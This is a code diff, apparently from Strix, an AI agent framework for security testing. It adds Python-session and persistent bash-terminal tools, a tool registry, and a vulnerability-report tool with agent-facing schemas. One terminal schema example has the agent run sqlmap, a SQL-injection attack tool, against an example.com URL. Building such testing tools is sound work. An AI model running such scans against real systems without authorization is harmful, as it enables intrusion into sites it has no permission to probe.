self, execution_result: Any, stdout_content: str, stderr_content: str
) -> dict[str, Any]:
stdout = self._truncate_output(
stdout_content, MAX_STDOUT_LENGTH, "... [stdout truncated at 10k chars]"
)
if execution_result.result is not None:
if stdout and not stdout.endswith("\n"):
stdout += "\n"
result_repr = repr(execution_result.result)
result_repr = self._truncate_output(
result_repr, MAX_STDOUT_LENGTH, "... [result truncated at 10k chars]"
)
stdout += result_repr
stdout = self._truncate_output(
stdout, MAX_STDOUT_LENGTH, "... [output truncated at 10k chars]"
)
stderr_content = stderr_content if stderr_content else ""
stderr_content = self._truncate_output(
stderr_content, MAX_STDERR_LENGTH, "... [stderr truncated at 5k chars]"
)
if (
execution_result.error_before_exec or execution_result.error_in_exec
) and not stderr_content:
stderr_content = "Execution error occurred"
return {
"session_id": self.session_id,
"stdout": stdout,
"stderr": stderr_content,
"result": repr(execution_result.result)
if execution_result.result is not None
else None,
}
def _handle_execution_error(self, error: BaseException) -> dict[str, Any]:
error_msg = str(error)
error_msg = self._truncate_output(
error_msg, MAX_STDERR_LENGTH, "... [error truncated at 5k chars]"
)
return {
"session_id": self.session_id,
"stdout": "",
"stderr": error_msg,
"result": None,
}
def execute_code(self, code: str, timeout: int = 30) -> dict[str, Any]:
session_error = self._validate_session()
if session_error:
return session_error
with self._execution_lock:
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
timeout
)
try:
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
signal.alarm(0)
return self._format_execution_result(
execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
)
except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
signal.alarm(0)
return self._handle_execution_error(e)
finally:
self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
def close(self) -> None:
self.is_running = False
self.shell.reset(new_session=False)
def is_alive(self) -> bool:
return self.is_running

View File

@@ -0,0 +1,131 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from .python_instance import PythonInstance
class PythonSessionManager:
def __init__(self) -> None:
self.sessions: dict[str, PythonInstance] = {}
self._lock = threading.Lock()
self.default_session_id = "default"
self._register_cleanup_handlers()
def create_session(
self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
with self._lock:
if session_id in self.sessions:
raise ValueError(f"Python session '{session_id}' already exists")
session = PythonInstance(session_id)
self.sessions[session_id] = session
if initial_code:
result = session.execute_code(initial_code, timeout)
result["message"] = (
f"Python session '{session_id}' created successfully with initial code"
)
else:
result = {
"session_id": session_id,
"message": f"Python session '{session_id}' created successfully",
}
return result
def execute_code(
self, session_id: str | None = None, code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
if not code:
raise ValueError("No code provided for execution")
with self._lock:
if session_id not in self.sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions[session_id]
result = session.execute_code(code, timeout)
result["message"] = f"Code executed in session '{session_id}'"
return result
def close_session(self, session_id: str | None = None) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
with self._lock:
if session_id not in self.sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions.pop(session_id)
session.close()
return {
"session_id": session_id,
"message": f"Python session '{session_id}' closed successfully",
"is_running": False,
}
def list_sessions(self) -> dict[str, Any]:
with self._lock:
session_info = {}
for sid, session in self.sessions.items():
session_info[sid] = {
"is_running": session.is_running,
"is_alive": session.is_alive(),
}
return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions = []
for sid, session in self.sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sid in dead_sessions:
session = self.sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
for session in sessions_to_close:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_python_session_manager = PythonSessionManager()
def get_python_session_manager() -> PythonSessionManager:
return _python_session_manager

196
strix/tools/registry.py Normal file
View File

@@ -0,0 +1,196 @@
import inspect
import logging
import os
from collections.abc import Callable
from functools import wraps
from inspect import signature
from pathlib import Path
from typing import Any
tools: list[dict[str, Any]] = []
_tools_by_name: dict[str, Callable[..., Any]] = {}
logger = logging.getLogger(__name__)
class ImplementedInClientSideOnlyError(Exception):
def __init__(
self,
message: str = "This tool is implemented in the client side only",
) -> None:
self.message = message
super().__init__(self.message)
def _process_dynamic_content(content: str) -> str:
if "{{DYNAMIC_MODULES_DESCRIPTION}}" in content:
try:
from strix.prompts import generate_modules_description
modules_description = generate_modules_description()
content = content.replace("{{DYNAMIC_MODULES_DESCRIPTION}}", modules_description)
except ImportError:
logger.warning("Could not import prompts utilities for dynamic schema generation")
content = content.replace(
"{{DYNAMIC_MODULES_DESCRIPTION}}",
"List of prompt modules to load for this agent (max 3). Module discovery failed.",
)
return content
def _load_xml_schema(path: Path) -> Any:
if not path.exists():
return None
try:
content = path.read_text()
content = _process_dynamic_content(content)
start_tag = '<tool name="'
end_tag = "</tool>"
tools_dict = {}
pos = 0
while True:
start_pos = content.find(start_tag, pos)
if start_pos == -1:
break
name_start = start_pos + len(start_tag)
name_end = content.find('"', name_start)
if name_end == -1:
break
tool_name = content[name_start:name_end]
end_pos = content.find(end_tag, name_end)
if end_pos == -1:
break
end_pos += len(end_tag)
tool_element = content[start_pos:end_pos]
tools_dict[tool_name] = tool_element
pos = end_pos
if pos >= len(content):
break
except (IndexError, ValueError, UnicodeError) as e:
logger.warning(f"Error loading schema file {path}: {e}")
return None
else:
return tools_dict
def _get_module_name(func: Callable[..., Any]) -> str:
module = inspect.getmodule(func)
if not module:
return "unknown"
module_name = module.__name__
if ".tools." in module_name:
parts = module_name.split(".tools.")[-1].split(".")
if len(parts) >= 1:
return parts[0]
return "unknown"
def register_tool(
func: Callable[..., Any] | None = None, *, sandbox_execution: bool = True
) -> Callable[..., Any]:
def decorator(f: Callable[..., Any]) -> Callable[..., Any]:
func_dict = {
"name": f.__name__,
"function": f,
"module": _get_module_name(f),
"sandbox_execution": sandbox_execution,
}
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode:
try:
module_path = Path(inspect.getfile(f))
schema_file_name = f"{module_path.stem}_schema.xml"
schema_path = module_path.parent / schema_file_name
xml_tools = _load_xml_schema(schema_path)
if xml_tools is not None and f.__name__ in xml_tools:
func_dict["xml_schema"] = xml_tools[f.__name__]
else:
func_dict["xml_schema"] = (
f'<tool name="{f.__name__}">'
"<description>Schema not found for tool.</description>"
"</tool>"
)
except (TypeError, FileNotFoundError) as e:
logger.warning(f"Error loading schema for {f.__name__}: {e}")
func_dict["xml_schema"] = (
f'<tool name="{f.__name__}">'
"<description>Error loading schema.</description>"
"</tool>"
)
tools.append(func_dict)
_tools_by_name[str(func_dict["name"])] = f
@wraps(f)
def wrapper(*args: Any, **kwargs: Any) -> Any:
return f(*args, **kwargs)
return wrapper
if func is None:
return decorator
return decorator(func)
def get_tool_by_name(name: str) -> Callable[..., Any] | None:
return _tools_by_name.get(name)
def get_tool_names() -> list[str]:
return list(_tools_by_name.keys())
def needs_agent_state(tool_name: str) -> bool:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
return False
sig = signature(tool_func)
return "agent_state" in sig.parameters
def should_execute_in_sandbox(tool_name: str) -> bool:
for tool in tools:
if tool.get("name") == tool_name:
return bool(tool.get("sandbox_execution", True))
return True
def get_tools_prompt() -> str:
tools_by_module: dict[str, list[dict[str, Any]]] = {}
for tool in tools:
module = tool.get("module", "unknown")
if module not in tools_by_module:
tools_by_module[module] = []
tools_by_module[module].append(tool)
xml_sections = []
for module, module_tools in sorted(tools_by_module.items()):
tag_name = f"{module}_tools"
section_parts = [f"<{tag_name}>"]
for tool in module_tools:
tool_xml = tool.get("xml_schema", "")
if tool_xml:
indented_tool = "\n".join(f" {line}" for line in tool_xml.split("\n"))
section_parts.append(indented_tool)
section_parts.append(f"</{tag_name}>")
xml_sections.append("\n".join(section_parts))
return "\n\n".join(xml_sections)
def clear_registry() -> None:
tools.clear()
_tools_by_name.clear()

View File

@@ -0,0 +1,6 @@
from .reporting_actions import create_vulnerability_report
__all__ = [
"create_vulnerability_report",
]

View File

@@ -0,0 +1,63 @@
from typing import Any
from strix.tools.registry import register_tool
@register_tool(sandbox_execution=False)
def create_vulnerability_report(
title: str,
content: str,
severity: str,
) -> dict[str, Any]:
validation_error = None
if not title or not title.strip():
validation_error = "Title cannot be empty"
elif not content or not content.strip():
validation_error = "Content cannot be empty"
elif not severity or not severity.strip():
validation_error = "Severity cannot be empty"
else:
valid_severities = ["critical", "high", "medium", "low", "info"]
if severity.lower() not in valid_severities:
validation_error = (
f"Invalid severity '{severity}'. Must be one of: {', '.join(valid_severities)}"
)
if validation_error:
return {"success": False, "message": validation_error}
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
report_id = tracer.add_vulnerability_report(
title=title,
content=content,
severity=severity,
)
return {
"success": True,
"message": f"Vulnerability report '{title}' created successfully",
"report_id": report_id,
"severity": severity.lower(),
}
import logging
logging.warning("Global tracer not available - vulnerability report not stored")
return { # noqa: TRY300
"success": True,
"message": f"Vulnerability report '{title}' created successfully (not persisted)",
"warning": "Report could not be persisted - tracer unavailable",
}
except ImportError:
return {
"success": True,
"message": f"Vulnerability report '{title}' created successfully (not persisted)",
"warning": "Report could not be persisted - tracer module unavailable",
}
except (ValueError, TypeError) as e:
return {"success": False, "message": f"Failed to create vulnerability report: {e!s}"}

View File

@@ -0,0 +1,30 @@
<tools>
<tool name="create_vulnerability_report">
<description>Create a vulnerability report for a discovered security issue.
Use this tool to document a specific verified security vulnerability.
Put ALL details in the content field - affected URLs, parameters, proof of concept, remediation steps, CVE references, CVSS scores, technical details, impact assessment, etc.
DO NOT USE:
- For general security observations without specific vulnerabilities
- When you don't have concrete vulnerability details
- When you don't have a proof of concept, or still not 100% sure if it's a vulnerability
- For tracking multiple vulnerabilities (create separate reports)
- For reporting multiple vulnerabilities at once. Use a separate create_vulnerability_report for each vulnerability.
</description>
<parameters>
<parameter name="title" type="string" required="true">
<description>Clear, concise title of the vulnerability</description>
</parameter>
<parameter name="content" type="string" required="true">
<description>Complete vulnerability details including affected URLs, technical details, impact, proof of concept, remediation steps, and any relevant references. Be comprehensive and include everything relevant.</description>
</parameter>
<parameter name="severity" type="string" required="true">
<description>Severity level: critical, high, medium, low, or info</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing success status and message</description>
</returns>
</tool>
</tools>

View File

@@ -0,0 +1,4 @@
from .terminal_actions import terminal_action
__all__ = ["terminal_action"]

View File

@@ -0,0 +1,53 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .terminal_manager import get_terminal_manager
TerminalAction = Literal["new_terminal", "send_input", "wait", "close"]
@register_tool
def terminal_action(
action: TerminalAction,
inputs: list[str] | None = None,
time: float | None = None,
terminal_id: str | None = None,
) -> dict[str, Any]:
def _validate_inputs(action_name: str, inputs: list[str] | None) -> None:
if not inputs:
raise ValueError(f"inputs parameter is required for {action_name} action")
def _validate_time(time_param: float | None) -> None:
if time_param is None:
raise ValueError("time parameter is required for wait action")
def _validate_action(action_name: str) -> None:
raise ValueError(f"Unknown action: {action_name}")
manager = get_terminal_manager()
try:
match action:
case "new_terminal":
return manager.create_terminal(terminal_id, inputs)
case "send_input":
_validate_inputs(action, inputs)
assert inputs is not None
return manager.send_input(terminal_id, inputs)
case "wait":
_validate_time(time)
assert time is not None
return manager.wait_terminal(terminal_id, time)
case "close":
return manager.close_terminal(terminal_id)
case _:
_validate_action(action) # type: ignore[unreachable]
except (ValueError, RuntimeError) as e:
return {"error": str(e), "terminal_id": terminal_id, "snapshot": "", "is_running": False}

View File

@@ -0,0 +1,114 @@
<tools>
<tool name="terminal_action">
<description>Perform terminal actions using a terminal emulator instance. Each terminal instance
is PERSISTENT and remains active until explicitly closed, allowing for multi-step
workflows and long-running processes.</description>
<parameters>
<parameter name="action" type="string" required="true">
<description>The terminal action to perform: - new_terminal: Create a new terminal instance. This MUST be the first action for each terminal tab. - send_input: Send keyboard input to the specified terminal. - wait: Pause execution for specified number of seconds. Can be also used to get the current terminal state (screenshot, output, etc.) after using other tools. - close: Close the specified terminal instance. This MUST be the final action for each terminal tab.</description>
</parameter>
<parameter name="inputs" type="string" required="false">
<description>Required for 'new_terminal' and 'send_input' actions: - List of inputs to send to terminal. Each element in the list MUST be one of the following: - Regular text: "hello", "world", etc. - Literal text (not interpreted as special keys): prefix with "literal:" e.g., "literal:Home", "literal:Escape", "literal:Enter" to send these as text - Enter - Space - Backspace - Escape: "Escape", "^[", "C-[" - Tab: "Tab" - Arrow keys: "Left", "Right", "Up", "Down" - Navigation: "Home", "End", "PageUp", "PageDown" - Function keys: "F1" through "F12" Modifier keys supported with prefixes: - ^ or C- : Control (e.g., "^c", "C-c") - S- : Shift (e.g., "S-F6") - A- : Alt (e.g., "A-Home") - Combined modifiers for arrows: "S-A-Up", "C-S-Left" - Inputs MUST in all cases be sent as a LIST of strings, even if you are only sending one input. - Sending Inputs as a single string will NOT work.</description>
</parameter>
<parameter name="time" type="string" required="false">
<description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
</parameter>
<parameter name="terminal_id" type="string" required="false">
<description>Identifier for the terminal instance. Required for all actions except the first 'new_terminal' action. Allows managing multiple concurrent terminal tabs. - For 'new_terminal': if not provided, a default terminal is created. If provided, creates a new terminal with that ID. - For other actions: specifies which terminal instance to operate on. - Default terminal ID is "default" if not specified.</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - snapshot: raw representation of current terminal state where you can see the output of the command - terminal_id: the ID of the terminal instance that was operated on</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: Terminal instances remain active and maintain their state (environment
variables, current directory, running processes) until explicitly closed with the
'close' action. This allows for multi-step workflows across multiple tool calls.
2. MULTIPLE TERMINALS: You can run multiple terminal instances concurrently by using
different terminal_id values. Each terminal operates independently.
3. Terminal interaction MUST begin with 'new_terminal' action for each terminal instance.
4. Only one action can be performed per call.
5. Input handling:
- Regular text is sent as-is
- Literal text: prefix with "literal:" to send special key names as literal text
- Special keys must match supported key names
- Modifier combinations follow specific syntax
- Control can be specified as ^ or C- prefix
- Shift (S-) works with special keys only
- Alt (A-) works with any character/key
6. Wait action:
- Time is specified in seconds
- Can be used to wait for command completion
- Can be fractional (e.g., 0.5 seconds)
- Snapshot and output are captured after the wait
- You should estimate the time it will take to run the command and set the wait time accordingly.
- It can be from a few seconds to a few minutes, choose wisely depending on the command you are running and the task.
7. The terminal can operate concurrently with other tools. You may invoke
browser, proxy, or other tools (in separate assistant messages) while maintaining
active terminal sessions.
8. You do not need to close terminals after you are done, but you can if you want to
free up resources.
9. You MUST end the inputs list with an "Enter" if you want to run the command, as
it is not sent automatically.
10. AUTOMATIC SPACING BEHAVIOR:
- Consecutive regular text inputs have spaces automatically added between them
- This is helpful for shell commands: ["ls", "-la"] becomes "ls -la"
- This causes problems for compound commands: [":", "w", "q"] becomes ": w q"
- Use "literal:" prefix to bypass spacing: [":", "literal:wq"] becomes ":wq"
- Special keys (Enter, Space, etc.) and literal strings never trigger spacing
11. WHEN TO USE LITERAL PREFIX:
- Vim commands: [":", "literal:wq", "Enter"] instead of [":", "w", "q", "Enter"]
- Any sequence where exact character positioning matters
- When you need multiple characters sent as a single unit
12. Do NOT use terminal actions for file editing or writing. Use the replace_in_file,
write_to_file, or read_file tools instead.
</notes>
<examples>
# Create new terminal with Node.js (default terminal)
<function=terminal_action>
<parameter=action>new_terminal</parameter>
<parameter=inputs>["node", "Enter"]</parameter>
</function>
# Create a second (parallel) terminal instance for Python
<function=terminal_action>
<parameter=action>new_terminal</parameter>
<parameter=terminal_id>python_terminal</parameter>
<parameter=inputs>["python3", "Enter"]</parameter>
</function>
# Send command to the default terminal
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>["require('crypto').randomBytes(1000000).toString('hex')",
"Enter"]</parameter>
</function>
# Wait for previous action on default terminal
<function=terminal_action>
<parameter=action>wait</parameter>
<parameter=time>2.0</parameter>
</function>
# Send multiple inputs with special keys to current terminal
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>["sqlmap -u 'http://example.com/page.php?id=1' --batch", "Enter", "y",
"Enter", "n", "Enter", "n", "Enter"]</parameter>
</function>
# WRONG: Vim command with automatic spacing (becomes ": w q")
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>[":", "w", "q", "Enter"]</parameter>
</function>
# CORRECT: Vim command using literal prefix (becomes ":wq")
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>[":", "literal:wq", "Enter"]</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,231 @@
import contextlib
import os
import pty
import select
import signal
import subprocess
import threading
import time
from typing import Any
import pyte
MAX_TERMINAL_SNAPSHOT_LENGTH = 10_000
class TerminalInstance:
def __init__(self, terminal_id: str, initial_command: str | None = None) -> None:
self.terminal_id = terminal_id
self.process: subprocess.Popen[bytes] | None = None
self.master_fd: int | None = None
self.is_running = False
self._output_lock = threading.Lock()
self._reader_thread: threading.Thread | None = None
self.screen = pyte.HistoryScreen(80, 24, history=1000)
self.stream = pyte.ByteStream()
self.stream.attach(self.screen)
self._start_terminal(initial_command)
def _start_terminal(self, initial_command: str | None = None) -> None:
try:
self.master_fd, slave_fd = pty.openpty()
shell = "/bin/bash"
self.process = subprocess.Popen( # noqa: S603
[shell, "-i"],
stdin=slave_fd,
stdout=slave_fd,
stderr=slave_fd,
cwd="/workspace",
preexec_fn=os.setsid, # noqa: PLW1509 - Required for PTY functionality
)
os.close(slave_fd)
self.is_running = True
self._reader_thread = threading.Thread(target=self._read_output, daemon=True)
self._reader_thread.start()
time.sleep(0.5)
if initial_command:
self._write_to_terminal(initial_command)
except (OSError, ValueError) as e:
raise RuntimeError(f"Failed to start terminal: {e}") from e
def _read_output(self) -> None:
while self.is_running and self.master_fd:
try:
ready, _, _ = select.select([self.master_fd], [], [], 0.1)
if ready:
data = os.read(self.master_fd, 4096)
if data:
with self._output_lock, contextlib.suppress(TypeError):
self.stream.feed(data)
else:
break
except (OSError, ValueError):
break
def _write_to_terminal(self, data: str) -> None:
if self.master_fd and self.is_running:
try:
os.write(self.master_fd, data.encode("utf-8"))
except (OSError, ValueError) as e:
raise RuntimeError("Terminal is no longer available") from e
def send_input(self, inputs: list[str]) -> None:
if not self.is_running:
raise RuntimeError("Terminal is not running")
for i, input_item in enumerate(inputs):
if input_item.startswith("literal:"):
literal_text = input_item[8:]
self._write_to_terminal(literal_text)
else:
key_sequence = self._get_key_sequence(input_item)
if key_sequence:
self._write_to_terminal(key_sequence)
else:
self._write_to_terminal(input_item)
time.sleep(0.05)
if (
i < len(inputs) - 1
and not input_item.startswith("literal:")
and not self._is_special_key(input_item)
and not inputs[i + 1].startswith("literal:")
and not self._is_special_key(inputs[i + 1])
):
self._write_to_terminal(" ")
def get_snapshot(self) -> dict[str, Any]:
with self._output_lock:
history_lines = [
"".join(char.data for char in line_dict.values())
for line_dict in self.screen.history.top
]
current_lines = self.screen.display
all_lines = history_lines + current_lines
rendered_output = "\n".join(all_lines)
if len(rendered_output) > MAX_TERMINAL_SNAPSHOT_LENGTH:
rendered_output = rendered_output[-MAX_TERMINAL_SNAPSHOT_LENGTH:]
truncated = True
else:
truncated = False
return {
"terminal_id": self.terminal_id,
"snapshot": rendered_output,
"is_running": self.is_running,
"process_id": self.process.pid if self.process else None,
"truncated": truncated,
}
def wait(self, duration: float) -> dict[str, Any]:
time.sleep(duration)
return self.get_snapshot()
def close(self) -> None:
self.is_running = False
if self.process:
with contextlib.suppress(OSError, ProcessLookupError):
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
try:
self.process.wait(timeout=2)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(self.process.pid), signal.SIGKILL)
self.process.wait()
if self.master_fd:
with contextlib.suppress(OSError):
os.close(self.master_fd)
self.master_fd = None
if self._reader_thread and self._reader_thread.is_alive():
self._reader_thread.join(timeout=1)
def _is_special_key(self, key: str) -> bool:
special_keys = {
"Enter",
"Space",
"Backspace",
"Tab",
"Escape",
"Up",
"Down",
"Left",
"Right",
"Home",
"End",
"PageUp",
"PageDown",
"Insert",
"Delete",
} | {f"F{i}" for i in range(1, 13)}
if key in special_keys:
return True
return bool(key.startswith(("^", "C-", "S-", "A-")))
def _get_key_sequence(self, key: str) -> str | None:
key_map = {
"Enter": "\r",
"Space": " ",
"Backspace": "\x08",
"Tab": "\t",
"Escape": "\x1b",
"Up": "\x1b[A",
"Down": "\x1b[B",
"Right": "\x1b[C",
"Left": "\x1b[D",
"Home": "\x1b[H",
"End": "\x1b[F",
"PageUp": "\x1b[5~",
"PageDown": "\x1b[6~",
"Insert": "\x1b[2~",
"Delete": "\x1b[3~",
"F1": "\x1b[11~",
"F2": "\x1b[12~",
"F3": "\x1b[13~",
"F4": "\x1b[14~",
"F5": "\x1b[15~",
"F6": "\x1b[17~",
"F7": "\x1b[18~",
"F8": "\x1b[19~",
"F9": "\x1b[20~",
"F10": "\x1b[21~",
"F11": "\x1b[23~",
"F12": "\x1b[24~",
}
if key in key_map:
return key_map[key]
if key.startswith("^") and len(key) == 2:
char = key[1].lower()
return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
if key.startswith("C-") and len(key) == 3:
char = key[2].lower()
return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
return None
def is_alive(self) -> bool:
if not self.process:
return False
return self.process.poll() is None

View File

@@ -0,0 +1,191 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from .terminal_instance import TerminalInstance
class TerminalManager:
def __init__(self) -> None:
self.terminals: dict[str, TerminalInstance] = {}
self._lock = threading.Lock()
self.default_terminal_id = "default"
self._register_cleanup_handlers()
def create_terminal(
self, terminal_id: str | None = None, inputs: list[str] | None = None
) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
with self._lock:
if terminal_id in self.terminals:
raise ValueError(f"Terminal '{terminal_id}' already exists")
initial_command = None
if inputs:
command_parts: list[str] = []
for input_item in inputs:
if input_item == "Enter":
initial_command = " ".join(command_parts) + "\n"
break
if input_item.startswith("literal:"):
command_parts.append(input_item[8:])
elif input_item not in [
"Space",
"Tab",
"Backspace",
]:
command_parts.append(input_item)
try:
terminal = TerminalInstance(terminal_id, initial_command)
self.terminals[terminal_id] = terminal
if inputs and not initial_command:
terminal.send_input(inputs)
result = terminal.wait(2.0)
else:
result = terminal.wait(1.0)
result["message"] = f"Terminal '{terminal_id}' created successfully"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to create terminal '{terminal_id}': {e}") from e
else:
return result
def send_input(
self, terminal_id: str | None = None, inputs: list[str] | None = None
) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
if not inputs:
raise ValueError("No inputs provided")
with self._lock:
if terminal_id not in self.terminals:
raise ValueError(f"Terminal '{terminal_id}' not found")
terminal = self.terminals[terminal_id]
try:
terminal.send_input(inputs)
result = terminal.wait(2.0)
result["message"] = f"Input sent to terminal '{terminal_id}'"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to send input to terminal '{terminal_id}': {e}") from e
else:
return result
def wait_terminal(
self, terminal_id: str | None = None, duration: float = 1.0
) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
with self._lock:
if terminal_id not in self.terminals:
raise ValueError(f"Terminal '{terminal_id}' not found")
terminal = self.terminals[terminal_id]
try:
result = terminal.wait(duration)
result["message"] = f"Waited {duration}s on terminal '{terminal_id}'"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to wait on terminal '{terminal_id}': {e}") from e
else:
return result
def close_terminal(self, terminal_id: str | None = None) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
with self._lock:
if terminal_id not in self.terminals:
raise ValueError(f"Terminal '{terminal_id}' not found")
terminal = self.terminals.pop(terminal_id)
try:
terminal.close()
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close terminal '{terminal_id}': {e}") from e
else:
return {
"terminal_id": terminal_id,
"message": f"Terminal '{terminal_id}' closed successfully",
"snapshot": "",
"is_running": False,
}
def get_terminal_snapshot(self, terminal_id: str | None = None) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
with self._lock:
if terminal_id not in self.terminals:
raise ValueError(f"Terminal '{terminal_id}' not found")
terminal = self.terminals[terminal_id]
return terminal.get_snapshot()
def list_terminals(self) -> dict[str, Any]:
with self._lock:
terminal_info = {}
for tid, terminal in self.terminals.items():
terminal_info[tid] = {
"is_running": terminal.is_running,
"is_alive": terminal.is_alive(),
"process_id": terminal.process.pid if terminal.process else None,
}
return {"terminals": terminal_info, "total_count": len(terminal_info)}
def cleanup_dead_terminals(self) -> None:
with self._lock:
dead_terminals = []
for tid, terminal in self.terminals.items():
if not terminal.is_alive():
dead_terminals.append(tid)
for tid in dead_terminals:
terminal = self.terminals.pop(tid)
with contextlib.suppress(Exception):
terminal.close()
def close_all_terminals(self) -> None:
with self._lock:
terminals_to_close = list(self.terminals.values())
self.terminals.clear()
for terminal in terminals_to_close:
with contextlib.suppress(Exception):
terminal.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_terminals)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_terminals()
sys.exit(0)
_terminal_manager = TerminalManager()
def get_terminal_manager() -> TerminalManager:
return _terminal_manager

View File

@@ -0,0 +1,4 @@
from .thinking_actions import think
__all__ = ["think"]

Some files were not shown because too many files have changed in this diff Show More